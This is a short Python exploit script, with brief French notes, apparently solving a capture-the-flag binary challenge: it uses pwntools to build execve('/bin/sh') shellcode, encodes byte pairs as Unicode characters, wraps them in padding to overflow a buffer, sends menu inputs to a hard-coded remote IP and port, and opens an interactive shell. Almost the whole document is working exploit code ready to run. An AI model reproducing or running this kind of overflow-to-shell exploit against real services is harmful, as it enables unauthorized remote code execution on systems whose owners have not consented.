"""
Méthode : Shellcode encodé → Buffer overflow → Shell

- Encodage spécial :
  Shellcode execve("/bin/sh") 
  Encodé par paires d'octets hex → caractères Unicode

- Structure payload fixe :
  2048 bytes 0x0101
  Shellcode encodé
  NULL byte 
  Padding jusqu'à 4001 bytes
  0x11000 + 0x0000 à la fin

- Commande : "eliot\n4007\n2\n"
  Username "eliot"
  Taille buffer 4007
  Option menu 2

- Vulnérabilité :
  Buffer overflow avec encodage 
  NULL byte 
"""

from pwn import *

context.arch = 'amd64'
p = remote('94.237.61.249', 49579)
 
shellcode = asm(shellcraft.sh())  # Shellcode execve("/bin/sh")
parts = iter([f'{b:x}' for b in shellcode])  # Convertit en hex
encoded = [chr(int(next(parts, '').rjust(2,'0')+c.rjust(2,'0'),16)).encode() for c in parts]

payload = b''
payload += chr(0x0101).encode() * 2048   # Padding 0x0101
payload += b''.join(encoded)  # Shellcode
payload += chr(0x00).encode()  # NULL byte
payload += chr(0x0101).encode() * (4001 - 2048 - len(encoded))  # Padding
payload += chr(0x11000).encode()  
payload += chr(0x0000).encode()  # NULL

p.send(b'eliot\n4007\n2\n')  # Username + buffer size + menu option
p.send(payload)
p.send(b'\n')
p.interactive()  # Shell
